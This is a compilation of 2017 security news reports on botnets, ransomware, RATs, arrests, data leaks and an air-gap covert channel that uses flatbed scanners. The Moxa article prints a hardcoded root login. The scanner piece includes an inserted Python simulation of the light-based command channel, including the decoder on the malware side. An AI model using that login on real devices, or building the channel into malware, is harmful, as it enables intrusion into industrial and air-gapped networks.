At the time of the takedown, Kelihos was one of the largest botnets out there, after tripling in size in a 24-hour window last year. At the beginning of the year, the bot was observed packing worm-like spreading capabilities, and soon became the top malicious threat, according to Check Point’s Top 10 malware.
Levashov was arrested in Barcelona on April 7, 2017 and has been detained since. The Department of Justice is currently seeking his extradition.
Russian Hacker Gets 27-Year Prison Sentence
24.4.2017 securityweek Crime
A 32-year-old Russian cybercriminal was sentenced in the United States last week to 27 years in prison for hacking into point-of-sale (PoS) computers to steal credit card numbers.
Roman Valeryevich Seleznev, who was also known as Track2, was convicted in August 2016 of 38 counts related to his scheme to hack PoS endpoints: 10 counts of wire fraud, eight counts of intentional damage to a protected computer, nine counts of obtaining information from a protected computer, nine counts of possession of 15 or more unauthorized access devices and two counts of aggravated identity theft.
He is the son of Russian politician Valery Seleznev, who accused the US of kidnapping when the hacker was arrested in the Maldives in 2014. The laptop Seleznev had in his custody when arrested contained over 1.7 million stolen credit card numbers (initially said to be 2.1 million), along with additional evidence linking the Russian to the servers, email accounts and financial transactions involved in the scheme.
Seleznev’s computer hacking crimes caused more than $169 million in damage to small businesses and financial institutions, the Department of Justice claims. Between October 2009 and October 2013, the man hacked into retail PoS systems and installed malicious software to steal credit card numbers. Evidence revealed that Seleznev earned tens of millions of dollars from his criminal activity.
More than 500 U.S. businesses were affected by the hacker, who sent the stolen data to servers that he controlled in Russia, Ukraine and McLean, Virginia. Seleznev then sold the credit card information on various criminal “carding” websites to others who used it for fraudulent purchases, evidence introduced during the trial revealed.
Seleznev mainly targeted small businesses, such as restaurants and pizza parlors in Western Washington, including Broadway Grill in Seattle, which went bankrupt after the cyber-attack. Overall, the hacker’s scheme affected around 3,700 financial institutions and caused more than $169 million in losses.
A separate indictment in the District of Nevada charges Seleznev with participating in a racketeer influenced corrupt organization (RICO), conspiracy to engage in a racketeer influenced corrupt organization, and two counts of possession of 15 or more counterfeit and unauthorized access devices. He is also charged in the Northern District of Georgia with conspiracy to commit bank fraud, one count of bank fraud and four counts of wire fraud.
Cyber Shield Act: A New Legislative Approach to Improving Cyber Security
24.4.2017 securityweek Cyber
The Cyber Shield Act is a legislative proposal designed to cut "to the core of critical infrastructure cyber defense." It is proposed by Senator Edward J. Markey, Massachusetts -- but you won't find a draft bill anywhere yet.
Markey is taking the unusual route of working with the Institute for Critical Infrastructure Technology (ICIT) to test his ideas, locate problems and seek solutions. James Scott, ICIT senior fellow, told SecurityWeek, "Sen Markey's office is proposing the Cyber Shield Act, and we are introducing it for them... His office briefed us a few times and we were giving some advice on how they could make it more doable."
Whether it is, in fact, doable remains to be seen. Currently, there are only two sources for further information: a YouTube discussion of Markey taking and answering questions on his ideas; and an analysis by ICIT. Scott is certainly bullish about its potential: his analysis is sub-titled 'Is the Legislative Community Finally Listening to Cybersecurity Experts?'
The proposal is fundamentally different to most cyber security legislation. That legislation often seeks to impose minimum standards of security behavior on business -- such as the proposed Cybersecurity Disclosure Act of 2017, which will force cyber responsibility into the boardroom.
Instead, the Cyber Shield Act seeks to give the consumers of security products better and more accurate information on which to base their purchasing decisions. With more accurate information informing decisions, the theory is that manufacturers and vendors will build better security into their products. Two particular aspects of the proposed Act highlight this.
The first is a requirement for "security-by-design throughout the development lifecycle of each and every device" in accordance with NIST 800-160. An example, suggests the ICIT analysis, is that at "a bare minimum, manufacturers must harden device security by requiring consumers to change default credentials."
The second is a rating system that will apply measurement criteria or cybersecurity scores to individual devices. Neither of these ideas is new, and both are fraught with difficulty -- and their acceptability is made both simpler and yet more difficult to achieve by Markey's insistence that adherence to the Act's provisions will be voluntary.
It is worth noting that the UK government launched a similar rating approach in 2013, based on the BIS Kitemark. The assumption was that business would rapidly adopt the voluntary scheme in order to demonstrate their quality and gain competitive advantage. David Willetts, minister of state for universities and science, announced at the time, "The cyber standard will promote excellence in tackling cyber risks, help businesses better understand how to protect themselves, and ultimately increase the nation's collective cyber security." It didn't fly. Even the BIS web site does not today display its own kitemark on its home page.
ICIT is not unaware of the difficulties, especially with the rating system. It points out that even the highest rating will not guarantee security; that new attack vectors not necessarily considered in the original rating will evolve; that 'secure' devices can still be breached laterally from other devices; and that many IT components are manufactured outside of US jurisdiction. Nevertheless, it insists that it is achievable.
"An artificial intelligence system," suggests ICIT, "could even be trained to weigh the data and calculate accurate scores. Instead of a star system (i.e. 4/5, etc.), Cyber Shield might be more meaningful and effective with a confidence score (i.e. there is a 92% chance that this device collects, processes, and transmits data securely). In this manner, consumer action is limited, and consumer understanding (of the background technical processes) is minimized."
Security by design and ratings are not the only aspects of the proposed Cyber Shield Act; but they are perhaps the most difficult. Markey and the ICIT believe they can be achieved between government, NIST experts and the industry. One group not specifically included, however, are the CISOs and other security officers that rely on these products to secure their organizations.
SecurityWeek asked the ICIT if this was an omission, suggesting that perhaps the only group truly qualified and incentivized to adequately promote security are those who depend upon it; that is the CISOs. Legislation has a history of failing to achieve its objectives, while vendors have a history of lobbying government to reduce security requirements.
The suggestion, one in fact proposed by Martin Zinaich, the information security officer for the City of Tampa, is that what is needed is an information security professional association -- much like the medical industry has the AMA of medical practitioners.
Scott replied, "Right now what we need is legislation that makes sense and encourages organizations to be more cybersecurity-centric. This bill includes security by design, industry outreach and education. We do have CISO organizations, but unfortunately, they typically don't have the pull at their organization to do anything significant. This is the most doable legislation for cyber that I've ever seen, and it's early enough in the life of it to be shaped and molded properly."
Zinaich, for his part, is not impressed. "This actually requires both ends of the political / practitioner spectrum," he told SecurityWeek. "Think of the millions of model device types -- who could possibly pull something like this off? Only practitioners working in conjunction with government, to put out a standard and keep it up to date. And do we simply measure things without the infrastructure to correct it and/or keep it on course?"
He added, "I feel a bit like Nostradamus -- I said if the industry didn't professionalize the Government would. James Scott is right in his response to SecurityWeek; CISOs do not have the pull needed. And they will unlikely get it until either they professionalize or the government does it for them. Yet, this is another 'voluntary' program, and that is a fail. Information Security is not only the devices, although that is a big part of it, but it is how the devices are installed and used, and how the business is or is not a partner in Information Security."
Zinaich is clear -- business should not be left out of this Act; and it is the CISOs, preferably led by a professional CISO association, that should provide the voice of business.
The proposed Cyber Shield Act is an ambitious project. There will be those, like Zinaich, who will doubt it can be effective. Nevertheless, the ICIT remains positive. "Cyber Shield," it concludes, "could be a catalyst to incite responsible cybersecurity adoption and implementation throughout multiple manufacturing sectors." Time will tell whether Senator Markey, with the help and advice of the ICIT, will succeed in solving the problems involved.
Hackers Are Using NSA's DoublePulsar Backdoor in Attacks
24.4.2017 securityweek BigBrothers
A hacking tool allegedly used by the NSA-linked threat actor “Equation Group” that was exposed to the public roughly a week ago has already been observed in live attacks.
Dubbed DoublePulsar, the backdoor was released by the Shadow Brokers hacker group on Friday before the Easter holiday, as part of a password-protected archive containing a larger set of tools and exploits. Last week Microsoft said that the newly revealed exploits don’t affect up-to-date systems.
DoublePulsar is the primary payload in SMB (Server Message Block) and RDP (Remote Desktop Protocol) exploits in the NSA’s FuzzBunch software, an exploitation framework similar to Metasploit, penetration tester zerosum0x0 explains.
This sophisticated, multi-architecture SMB backdoor can hide on a system and avoid alerting built-in defenses. An attacker could infect a system and return to it after a desired period of time to perform more intrusive actions.
MWR InfoSecurity's Countercept group also notes that DoublePulsar appears to be a very stealthy kernel-mode payload, while also revealing that it is dropped by default by many exploits. The backdoor, they say, can be used to inject arbitrary DLLs into user land processes.
Following in-depth analysis, Countercept discovered that the malware would enumerate processes to find the suitable one for injecting the user land DLL and execute code. They also discovered that the payload would wipe memory for evasion, though parts of the code would remain unwiped, it seems.
The firm also decided to build a script to detect the presence of both SMB and RDP versions of the DoublePulsar implant, so as to help people find compromises in their networks. “It re-implements the ping command of the implant, which can be used remotely without authentication, in order to determine if a system is infected or not,” they explain.
On April 18, after using the masscan tool developed by @ErrataRob to find 5,502,460 unique hosts with an open port 445 (the SMB port), Below0Day used Countercept’s detection script to identify 30,626 hosts carrying the DoublePulsar SMB implant. On April 21, the same scan revealed 5,190,506 exposed hosts and 56,586 infections, most of which were located in the United States.
This shows that the exploit is actively used in infection campaigns, and the number of compromised hosts appears to be growing fast, most probably as more actors start using the implant in their attacks.
Hardcoded Credentials Give Attackers Full Access to Moxa APs
24.4.2017 securityweek Vulnerability
Taiwan-based industrial networking, computing and automation solutions provider Moxa has released an update for some of its wireless access points (APs) to address a critical vulnerability that can be exploited by hackers to gain complete control of affected devices.
Researchers at Cisco’s Talos intelligence and research group have analyzed Moxa’s AWK-3131A AP/bridge/client product, which is recommended for any type of industrial wireless application, and discovered hardcoded credentials corresponding to an account that cannot be disabled or removed.
According to researchers, an attacker can leverage the username “94jo3dkru4” and the password “moxaiwroot” to log in to an undocumented account that provides root privileges.
The flaw, tracked as CVE-2016-8717, has been patched by Moxa with a software update. Users who cannot immediately apply the patch have been advised by Cisco to disable remote access services such as SSH and Telnet.
Experts at Cisco have identified a significant number of vulnerabilities as part of their research into Moxa’s AWK-3131A product. The list includes authentication issues that allow dictionary attacks and session hijacking, many cross-site scripting (XSS) vulnerabilities in the web interface, information disclosure bugs, denial-of-service (DoS) flaws, and several command injections.
Technical details on the other security holes were made public earlier this month after Moxa had released fixes. CVE-2016-8717 was mentioned in Cisco’s initial advisory, but its details were not disclosed to prevent potential attacks.
Cisco said Moxa has been very cooperative and it even gave researchers access to some of its source code.
Denmark Says Russia Hacked Defense Ministry Emails
24.4.2017 securityweek BigBrothers
Denmark on Monday denounced Moscow's "aggressive" behavior after a report accused Russian hackers of infiltrating the defense ministry's email accounts.
"This is part of a continuing war from the Russian side in this field, where we are seeing a very aggressive Russia," Defense Minister Claus Hjort Frederiksen told Danish news agency Ritzau.
A report published Sunday by the Centre for Cyber Security accused a group of pro-Kremlin hackers of breaking into the emails of defense ministry employees in 2015 and 2016.
"The hacked emails don't contain military secrets, but it is of course serious," Frederiksen said.
The report identified the hacker group as APT28, also known as Pawn Storm, Sofacy and Fancy Bear, which has links to the Russian government and security services and has previously been named by the FBI and US Homeland Security as being behind "malicious cyber activity" against US government bodies.
The group is also believed to be behind other high-profile cyber attacks.
In Denmark, the Centre for Cyber Security said earlier this year that the threat against Danish authorities and companies remained "very high".
Locky Ransomware Returns in New Necurs-driven Campaign
24.4.2017 securityweek Ransomware
Locky was the dominant ransomware in 2016, but was less active in the first quarter of 2017. Now the threat is back with a new Necurs-driven campaign, which was first spotted on April 21. Necurs is a major botnet with estimates last year of up to 1.7 million captive computers.
According to SophosLabs' telemetry, global spam volumes dropped dramatically just before Christmas 2016. At the time, Sophos global malware escalations manager Peter Mackenzie suggested, "The reason for this has not been conclusively proven, but the evidence points to a notorious botnet called Necurs going quiet."
On March 21, the same Sophos telemetry showed a sudden jump in global spam, with up to five times the background level of spam. Necurs was back. "Interestingly," suggested Sophos senior security advisor Paul Ducklin, "this time it isn’t malware that’s being blasted out, but an old-school type of scam that we haven’t seen for a while, mainly because it didn’t work very well in the past: pump-and-dump."
Today, just one month later, Necurs has switched back to delivering the Locky ransomware. According to Talos, Locky is currently being distributed in high volumes. "Talos has seen in excess of 35K emails in the last several hours associated with this newest wave of Locky," blogged Nick Biasini, an outreach manager with Cisco Talos.
The new Locky campaign is similar to the majority of spam campaigns. A number of different emails are used, in this case largely designed around payments or receipts. An example email given by Talos has the subject 'Receipt#272'. There is no body to the mail; just an attached PDF with a name associated with the subject name; that is, 'P272.pdf'.
There seem to be either two concurrent campaigns, or two different methodologies within the same campaign. In one, the email subject remains constant for only a couple of messages before changing. In the other, the same subject line is used for tens of thousands of messages.
The technique used to deliver the Locky ransomware is the same one used in a recent Dridex campaign. The email attachment is a PDF, but it contains little more than an embedded .DOCM Word document with the same name as the PDF file. The Word document contains the macro that is used to pull down Locky and encrypt the files. In the example given by Talos, it was "an XOR'd Macro that downloaded the Locky sample from what is likely a compromised website."
"There are a couple of interesting aspects of using this technique one of which is requiring user interaction to get the sample to run, defeating many sandboxing technologies," writes Biasini. Since the malware is dormant until specifically activated by the user, it won't fire in the sandbox.
This new campaign shows the close relationship between Locky and Necurs. If Necurs isn't delivering Locky, Locky's incidence goes down. But it also demonstrates that dormancy in either does not mean the threat has gone away. It is back with a twist.
"For a time," writes Biasini, "PDF based compromise was down significantly and word macro based compromise up. In this campaign they figured out how to disguise a macro laden word doc in a PDF, compromising victims around the globe."
Cardinal RAT Remained Hidden for Two Years
24.4.2017 securityaffairs Virus
A recently discovered remote access Trojan (RAT) that abuses Excel macros in an innovative way has been active for more than two years, Palo Alto Networks security researchers reveal.
Dubbed Cardinal RAT, the malware had a very low volume over the two-year timeframe, with only 27 total samples found to date. The manner in which the threat is delivered, however, is both innovative and unique: malicious macros in Microsoft Excel documents are used to compile embedded C# (C Sharp) source code into an executable that downloads the RAT.
The delivery documents, which the Palo Alto Networks researchers refer to as the Carp downloader, use various financial-related lures to trick users into executing them. The malicious macros were designed to generate two paths: one to a randomly named executable, and one to a randomly named C# file in the %APPDATA%\Microsoft folder.
Next, the macro base64-decodes the embedded C# source code and writes it to the C# file path, after which it compiles and executes the C# source code using the Microsoft Windows built-in csc.exe utility. The executed code simply downloads the Cardinal RAT from secure.dropinbox[.]pw using HTTP on port 443 (not HTTPS), decrypts it using AES-128, and then executes it.
The malware was named Cardinal RAT based on the internal names used by the author within the observed Microsoft .NET Framework executables, the security researchers reveal. Because only 27 unique samples of the RAT have been found, the malware managed to remain hidden although some of these samples are dating back to December 2015.
When executed on an infected system, the malware checks its current working directory and enters an installation routine if the directory doesn’t match the expected path. The threat copies itself to a randomly named executable in the specified directory, after which it compiles and executes embedded source code featuring watchdog functionality.
The newly spawned executable ensures that a specific registry key is set, and periodically queries the key to verify it is set appropriately and to re-set it if it has been deleted. This key acts as a persistence mechanism, as it ensures the RAT is executed every time a user logs on.
The watchdog process checks that the Cardinal RAT process is always running and that the executable is located in the correct path. If one of these conditions isn’t met, it either spawns a new instance of Cardinal RAT, or writes the malware to the correct location.
After completing the installation routine, the RAT injects itself into a newly spawned process, attempting to use one of six executables for this process: RegAsm.exe, RegSvcs.exe, vbc.exe, csc.exe, AppLaunch.exe, or cvtres.exe.
Some of the malware samples are configured with a single command and control (C&C) server, while others use multiple host and port combinations. Cardinal RAT parses a configuration, then attempts to connect to the C&C. Data is transmitted in two pieces: a DWORD specifying the data length, and the data itself, encrypted using a series of XOR and addition operations, followed by decompression using the ZLIB library, Palo Alto Networks reveals.
The RAT sends a wealth of information to the server, including username, hostname, campaign identifier, Microsoft Windows version, victim unique identifier, processor architecture, and malware version (1.4). It was designed to collect victim information, update settings and itself, act as a reverse proxy, execute commands, uninstall itself, recover passwords, download and execute new files, log keystrokes, capture screenshots, and clean cookies from browsers.
Europol, European police agencies and private actors dismantled cybercrime ring
24.4.2017 securityaffairs CyberCrime
Europol coordinated an international operation that dismantled a cybercrime ring offering services and tools to conceal malware from security products.
Europol dismantled the cybercrime ring as the result of a joint investigation conducted by Spanish and British law enforcement authorities (the Spanish National Police and the UK’s Regional Cyber Crime Unit for Tackling North West Serious Organised Crime (TITAN)) with the support of partners in the private sector. The activity was coordinated by the Europol Joint Cybercrime Action Taskforce (J-CAT); law enforcement dismantled a criminal organization involved in the design, development and sale of sophisticated tools that render malware undetectable by security solutions.
The cybercrime ring developed a tool that was used by crooks worldwide to distribute Remote Access Trojans and keyloggers. The criminal gang was offering the tools for sale on hacking forums.
“A joint investigation by Spanish and British law enforcement authorities, coordinated by Europol and its Joint Cybercrime Action Taskforce (J-CAT), has resulted in the dismantling of an international cybercrime group involved in the design, development and selling of sophisticated software tools to render all types of malicious malware infecting thousands of computers worldwide undetectable by security products.” reads the Press Release published by the Europol.
The European Police identified and arrested 5 individuals, 3 in Spain and 2 in the United Kingdom.
During searches in Spain, the investigators seized 6 hard drives, a laptop, 2 external storage devices, 8 Bitcoin mining devices and many documents.
Europol's role was crucial: the organization supported a two-year-long investigation that started at the end of 2015 by providing information exchange, operational coordination, forensic expertise and on-the-spot support.
The operation had two main phases: the first, carried out in the UK in April last year, resulted in the arrest of two suspects; the second, carried out in Spain in April this year, led to 3 arrests.
“To support the actions on the spot, experts from Europol’s European Cybercrime Centre (EC3) were deployed to the UK and Spain. This allowed for real-time intelligence analysis and cross-checks against Europol’s databases, as well as forensic support.” Europol reported.
According to the investigators, the cybercrime ring had been active since mid-2013 and was running a very profitable business.
Europol warns of the growing use by cybercrime rings of encryption and anonymity services to conceal their illegal activities.
This phenomenon and other criminal trends were detailed in Europol's Internet Organised Crime Threat Assessment (IOCTA) 2016.
“The use of encryption by criminals to protect their communications or stored data represents a considerable challenge for law enforcement, denying access to essential intelligence and evidence. This is a cross-cutting issue that affects all crime areas. The growing regularity of native encryption on mobile devices compounds this problem” states the report.
Technical issue at the Jharkhand govt website caused the exposure of more than 1.4 million Aadhaar numbers
24.4.2017 securityaffairs Incident
Personal information associated with more than a million Aadhaar numbers was published on a Jharkhand government website because of a technical problem.
The digital identities of more than a million citizens were exposed by a coding error on a website maintained by the Jharkhand Directorate of Social Security.
“We got to know about it this week itself. Our programmers are working on it, and the matter should be addressed very soon,” said MS Bhatia, secretary of the state’s social welfare department.
The Directorate's database holds personal information on more than 1.6 million pensioners; the technical issue exposed citizen records containing the names, addresses, Aadhaar numbers and bank account details of beneficiaries of Jharkhand's old-age pension scheme.
“Their personal details are now freely available to anyone who logs onto the website, a major privacy breach at a time when the Supreme Court, cyber-security experts and opposition politicians have questioned a government policy to make Aadhaar mandatory to get benefits of a variety of government schemes and services.” reported the Hindustantimes.com.
The glitch also exposed transaction-level data on the pensions paid to those citizens.
The Hindustan Times highlighted that publishing Aadhaar numbers contravenes Section 29 (4) of the Aadhaar Act.
Earlier this year, the Unique Identification Authority of India (UIDAI) blacklisted an Aadhaar service provider for 10 years due to a data leak that exposed the Aadhaar number of MS Dhoni, former captain of the Indian cricket team.
Incidents and abuses involving the Indian biometric ID system are not a rarity.
According to Congress leader Jairam Ramesh, the incident “makes a complete mockery of all that Jaitley and Ravi Shankar Prasad have said in Parliament.”
“Will the CEO of UIDAI take any action against the government of Jharkhand for making this dataset public? And if they don’t, does that mean they condone this act?” said Pranesh Prakash, policy director at the Centre for Internet and Society.
Aadhaar is the world's largest biometric ID system, with over 1.123 billion enrolled members as of 28 February 2017; providing an Aadhaar number is mandatory when filing income tax returns.
Unfortunately, according to Ramesh, the system has caused numerous problems for people; in some cases citizens have been denied their legally mandated welfare entitlements.
Russia spied on the e-mails of Danish military personnel
24.4.2017 Novinky/Bezpečnost BigBrother
Russia, through a group of hackers, penetrated the Danish military's systems and in 2015 and 2016 had access to the e-mails of some of its personnel. The Danish newspaper Berlingske reported this on Sunday, citing Danish Defence Minister Claus Hjort Frederiksen.
According to the paper, the attack was carried out by the Russian state-controlled hacker group APT28, which reportedly gained access to e-mail accounts of the US Democratic Party last year. "These are not small groups of hackers who do such things just for fun. It is connected to intelligence services or central elements of the Russian government," the paper quotes the minister as saying.
According to the Danish intelligence service, the attack represents a significant security risk, among other reasons because information obtained from the e-mails could be used by Russia to recruit agents within the Danish military, Berlingske writes.
Oops, hackers can reach malware inside air-gapped networks by controlling it through a scanner
24.4.2017 securityaffairs Hacking
A group of Israeli researchers has devised a new technique to send commands to malware running on a PC in an air-gapped network, using the network's flatbed scanner as the receiver.
The team was composed of Ben Nassi, a graduate student at the Cyber Security Research Center at Ben-Gurion University, and his advisor Yuval Elovici, based on an idea of the prominent cryptographer Adi Shamir.
The technique can be used by attackers to establish a covert communication channel between malicious code running on a target machine inside an air-gapped network and an attacker on the outside.
It leverages a flatbed scanner, which the researchers used to deliver commands to their malicious code running on the victim's network.
“Our method uses light transmitted by an attacker to a flatbed scanner, which is then extracted by a malware installed in the organization.” reads the paper published by the researchers. ” Our method exploits an organization’s scanner which serves as a gateway to the organization, in order to establish a covert channel between a malware and an attacker. The attacker controlling the light source can be located far away from the targeted scanner”
To get commands into the air-gapped network, the researchers aim a light source at the scanner, which receives the modulated signal.
A flatbed scanner senses the light reflected through its glass pane and converts it into an image; the malware then reads that image and translates the light intensity back into bits. Scanners are sensitive to any change of light in the surrounding environment, even when a sheet of paper is lying on the glass or when the light source is infrared.
The researchers transmitted the signal by pointing a light at the glass pane; commands are binary-encoded by turning the light on and off, and each command is delimited by a specific binary sequence (1001).
According to the researchers, the attacker can also send messages to the malicious code by hijacking an existing light source installed in the vicinity of the scanner, a smart bulb for instance.
In one test, the team deleted a file on the target system by sending the command “erase file xxx.doc” with a laser mounted on a stand 900 meters away from a glass-walled building.
In a real attack scenario, a drone carrying a laser could do the same while hovering outside an office window.
For such an attack to succeed, the malware must already be present on the target machine, and a scanner with an at least partially open lid must be connected to the PC so that it can receive the light.
In a real attack scenario, malicious code could infect the target network and then scan it for connected scanners. To avoid detection, the scanning could be triggered at night or at weekends, when the office is empty.
As for transmission speed, each bit of a command took 50 milliseconds to transmit.
This means a 64-bit message took about three seconds. The malware read the signal in real time and acknowledged receipt by triggering a second scan once the command sequence ended.
In another test, the team used the technique to trigger a ransomware attack, sending the encrypt command from a car in the parking lot. The attacker controlled a flickering smart bulb via Bluetooth from a Samsung Galaxy S4.
“The driver held a Samsung Galaxy S4 while driving in order to perform the attack from, a dedicated application that we wrote and installed on the Galaxy. The application scans for a MagicBlue smart bulb and connects to it. After connection, the application modulates a given command as light sequence using a series of “on” (1 bit) and “off” (0 bit) signals sent from over a BLE channel” continues the paper.
The scanners used in the tests could detect brightness changes from the smart bulb as small as a 5 percent reduction in light, in pulses lasting less than 25 milliseconds; such flicker goes unnoticed by the human eye.
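The channel described above, reduced to a simulation, as an added example that is not the Ben-Gurion researchers' code: the attacker encodes an ASCII command as on/off bits framed by the 1001 delimiter, the "scanner" integrates one brightness sample per 50 ms slot, and the malware thresholds the samples and parses the frame. The page gives the building blocks (binary on/off encoding, the 1001 delimiter, 50 ms per bit, a 5 percent brightness drop being enough); the exact frame layout (marker, one length byte, payload, marker), the polarity (a 1 bit dims the light) and the Gaussian noise are assumptions made for the demo.

```python
# Added example (not the researchers' code): simulation of the light-to-scanner
# covert channel. Frame layout, bit polarity and noise model are assumptions.
import random

MARKER = [1, 0, 0, 1]        # delimiter around each command, per the paper
BIT_PERIOD_S = 0.050         # 50 ms per bit, per the paper
DIM_FRACTION = 0.05          # a '1' bit dims the light by 5 % (assumed polarity)


def _byte_to_bits(value: int) -> list:
    return [(value >> i) & 1 for i in range(7, -1, -1)]


def _bits_to_byte(bits: list) -> int:
    return sum(bit << (7 - i) for i, bit in enumerate(bits))


def encode_command(cmd: str) -> list:
    """Attacker side: wrap an ASCII command in the 1001 markers, with a length byte."""
    data = cmd.encode("ascii")
    if len(data) > 255:
        raise ValueError("command too long for a one-byte length field")
    bits = _byte_to_bits(len(data))
    for b in data:
        bits += _byte_to_bits(b)
    return MARKER + bits + MARKER


def transmission_time_s(bits: list) -> float:
    """How long the light source must flicker to send these bits."""
    return len(bits) * BIT_PERIOD_S


def modulate(bits: list, ambient: float = 200.0, noise_sigma: float = 0.5, seed: int = 1) -> list:
    """Light-source side: one brightness sample per 50 ms slot, as the scanner's
    sensor would integrate it. Gaussian noise stands in for ambient fluctuation
    (constructed, seeded so the run is repeatable)."""
    rng = random.Random(seed)
    samples = []
    for bit in bits:
        level = ambient * (1.0 - DIM_FRACTION) if bit else ambient
        samples.append(level + rng.gauss(0.0, noise_sigma))
    return samples


def demodulate(samples: list, ambient: float = 200.0) -> list:
    """Malware side: threshold each slot halfway between 'lit' and 'dimmed'."""
    threshold = ambient * (1.0 - DIM_FRACTION / 2.0)
    return [1 if s < threshold else 0 for s in samples]


def decode_command(bits: list):
    """Malware side: return the command from the first well-formed frame, else None."""
    n = len(MARKER)
    for start in range(len(bits) - n + 1):
        if bits[start:start + n] != MARKER:
            continue
        pos = start + n
        if pos + 8 > len(bits):
            continue
        length = _bits_to_byte(bits[pos:pos + 8])
        pos += 8
        end = pos + 8 * length
        if end + n > len(bits) or bits[end:end + n] != MARKER:
            continue  # a 1001 pattern inside noise or data; keep searching
        payload = bytes(_bits_to_byte(bits[pos + 8 * i:pos + 8 * i + 8]) for i in range(length))
        try:
            return payload.decode("ascii")
        except UnicodeDecodeError:
            continue
    return None


if __name__ == "__main__":
    cmd = "erase file xxx.doc"  # the command used in the 900 m laser test
    frame = encode_command(cmd)
    print(f"{len(frame)} bits, {transmission_time_s(frame):.1f} s of flicker")
    print("malware decoded:", decode_command(demodulate(modulate(frame))))
```

The 18-character command costs 160 bits, i.e. eight seconds of flicker at 50 ms per bit, which is why the attack can stay below the 25 ms pulses a human would notice yet still needs the scanner lid open for a few seconds. The threshold sits halfway between the lit and dimmed levels, so a reading taken with no transmission in progress yields all zeros and no frame.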
The researchers note that one possible countermeasure is to disconnect scanners from internal networks, but this is rarely feasible because of the impact on employees' ordinary work.
The better countermeasure is a proxy setup: the scanner is connected by wire to a single computer on the organization's network that processes its output, so the scanner is never directly reachable from the network.
“However, we believe that a proxy based solution will prevent the attacker from establishing such a covert channel without the need to apply extreme changes. The scanner will be connected by a wire directly (e.g., using a USB interface) to a computer (proxy) within the organization’s network instead of being connected to the network. The proxy will provide an API. When a scanning request is received, the computer initiates a scan and processes the output in a classifier in order to detect malicious scan” concluded the researchers.
What Is Metadata Retention, And How Do You Maintain Your Privacy?
24.4.2017 securityaffairs Security
As Australia's newly approved Data Retention law comes into effect, how does it actually affect the average internet user in the country?
As Australia’s newly approved Data Retention law comes into effect, internet users across the country are frantically searching for a way to dodge government surveillance and ISP tracking. But how does the law actually affect the average Australian internet user? What is metadata anyway? And what can you do to protect your metadata?
Read on to get the answers to some of the most frequently asked questions following Australia’s Data Retention Law.
What Is Metadata?
In layman's terms, metadata is data about data. More precisely, metadata describes a set of data, explaining how and when it was collected and by whom. It summarizes basic information about data, making it easier to find and work with particular instances of it.
What Is Included In Metadata?
Metadata is not so much what you type on a handheld device or say on the phone. Rather, it is the trail of footprints you leave behind when you visit sites, download files or are otherwise online: who connected to what, from where, when and for how long. Understandably, it can give ISPs, telecom companies, snoopers and government agencies a detailed picture of your internet activity.
What Do People Say About Metadata Retention?
It is safe to say that when it comes to online privacy, the average internet user in Australia still does not grasp the implications of the new Data Retention law. In an interview with News.com.au, Dr Jake Goldenfein of Swinburne University of Technology explained,
“When it comes to your online data and the privacy protections afforded to it, there’s a lot we don’t know. Unfortunately we just don’t really know what ISPs are doing with data really. We don’t know if it’s being anonymised and sold, or the degree to which the data they collect is being regulated by privacy law because evidently it depends on the structure of the data bases through which it’s retained.”
While the average internet user in Australia would identify freedom as a constitutional right, many fail to connect that concept with online freedom and privacy.
Digital rights advocacy groups across Australia, however, have proactively rallied against the law. They recently called for a “National Get A VPN Day” to impress upon internet users the importance of protecting their personal data, online privacy and freedom.
How Do You Protect Your Data From The Metadata Retention Law?
Now that you know how metadata tracks your digital footprints, you should also realize how easy it is for your ISP, telecom company or the government to keep tabs on your online activity.
There are, however, ways to shrink this digital trail. The most effective and cheapest way to keep your connection metadata away from ISPs, telecom companies and government agencies is a VPN. The author recommends a service such as IVACY VPN, which it considers the best VPN for Australia for stopping metadata retention.
How Does A VPN Help Protect Your Personal Information?
Because all your traffic is encrypted between your device and the VPN server, your ISP, telecom company or government agency cannot read it or see which sites you visit.
Once you are connected to a VPN, the only information about you that your ISP can see is that you are connected to a VPN server, plus the timing and volume of the encrypted traffic. All other details are protected by the VPN's encryption protocols. The caveat is that the VPN provider now sees exactly what your ISP used to see, so its logging policy and jurisdiction matter as much as its encryption.
It is understandable, therefore, why digital rights groups in Australia promptly called for a National Get A VPN Day right after the Data Retention law was passed.
Insidious Karmen: even your grandmother could operate this ransomware
23.4.2017 Živě.cz Viruses
How hard is it to run a ransomware campaign?
Karmen looks more like a CRM system than malware
Anyone can find their way around the web interface
The most insidious type of virus is, without question, ransomware. Unlike ordinary malware, which uses your computer to send spam or mine bitcoins and therefore has every interest in going unnoticed, you notice ransomware immediately. By then, however, it is usually too late.
Inside an insidious ransomware: this is what an attack on HR staff's computers looks like
Ransomware encrypts the victim's data and then demands a ransom. The only reliable defence is therefore a backup of all personal documents and sensitive data.
GoldenEye
At the start of the year we took a close look at one such ransomware. It was one of the many variants of the Petya virus, which encrypted the computer's entire system partition, so that after a reboot Windows no longer loaded; instead a tiny program stored at the beginning of the hard disk announced that you were the victim of an attack and that unless you paid a ransom of around 1.3 BTC (currently 42,000 CZK) you would lose absolutely everything.
Hello, we have encrypted your computer. Send us bitcoin and enjoy the rest of your day
The winter Petya/GoldenEye ransomware posed as the fake CV of a certain Rolf Drescher, spread as an XLS e-mail attachment, and thus targeted inattentive HR staff who, hoping for a new top employee, might forget basic security rules.
My name is Karmen, I will encrypt your files and you will pay me
A few months have passed and this time it is the specialists at Recorded Future showing off an interesting catch. They mapped a new ransomware strain called Karmen, which was most likely inspired by the educational open-source “ransomware” Hidden Tear, whose code is on GitHub.
A new ransomware, Karmen, has appeared on underground marketplaces
Karmen seems less dangerous than Petya: it encrypts only the user files it has permissions for. Essentially you have to run it yourself, and on top of that it requires the .NET Framework to run.
But that is enough. Ransomware does not need to encrypt system files. Why would it? They are worth nothing. Its target is your own folder under C:\Users, which it starts working through immediately after launch and, depending on disk speed and data volume, destroys file after file with sufficiently strong AES-256 encryption.
Video: this is how ransomware attacks
The victim soon notices, because the files get a new extension, GRT, and a new icon. What happens is illustrated by the video below, made by the virus's authors themselves. First you see several Explorer windows with ordinary files, which the author opens to show they are intact.
Then the author runs the virus itself, which immediately starts encrypting files. At the same time a ransom note appears on screen, warning the victim not to attempt anything, or the data could be lost for good. When the files are opened again, their contents of course no longer match the originals.
The ransomware also tries to detect whether it is running in a sandbox (for example on an antivirus company's virtual machine). In that case it immediately deletes the decryption component, so an analyst cannot easily find out how it works inside.
Even your grandmother could run Karmen
